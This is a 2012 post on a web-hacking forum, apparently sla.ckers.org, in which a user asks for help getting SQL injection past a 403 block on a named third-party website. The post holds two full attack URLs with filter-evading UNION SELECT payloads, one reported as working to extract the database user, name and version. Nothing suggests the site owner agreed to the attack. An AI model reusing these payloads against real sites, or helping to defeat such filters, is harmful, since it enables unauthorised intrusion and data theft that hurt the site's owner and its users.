one way or another...

sla.ckers.org is
ha.ckers sla.cking

How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack.

Go to Topic: Previous•Next

Go to: Forum List•Message List•New Topic•Search•Log In

one way or another...

Posted by: zikmik

Date: February 21, 2012 02:07PM

Hi,
I'm stuck here (403 Forbidden):
http://www.amigoh.com/aboox/index.php?mod=verseim&read=yes&id=113+/*!AND*/+1=0+/*!unION*/+/*!selECT*/+1,2,3,4,5,6,7,8--

I manage to find another page on the same site that is vuln:
http://www.amigoh.com/aboox/pview.php?id=191+/*!AND*/+1=0+/*!unION*/+/*!selECT*/+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8--

but I am still wondering how to bypass first one...

Options: Reply•Quote

Go to: Forum List•Message List•Search•Log In

Sorry, only registered users may post in this forum.

Click here to login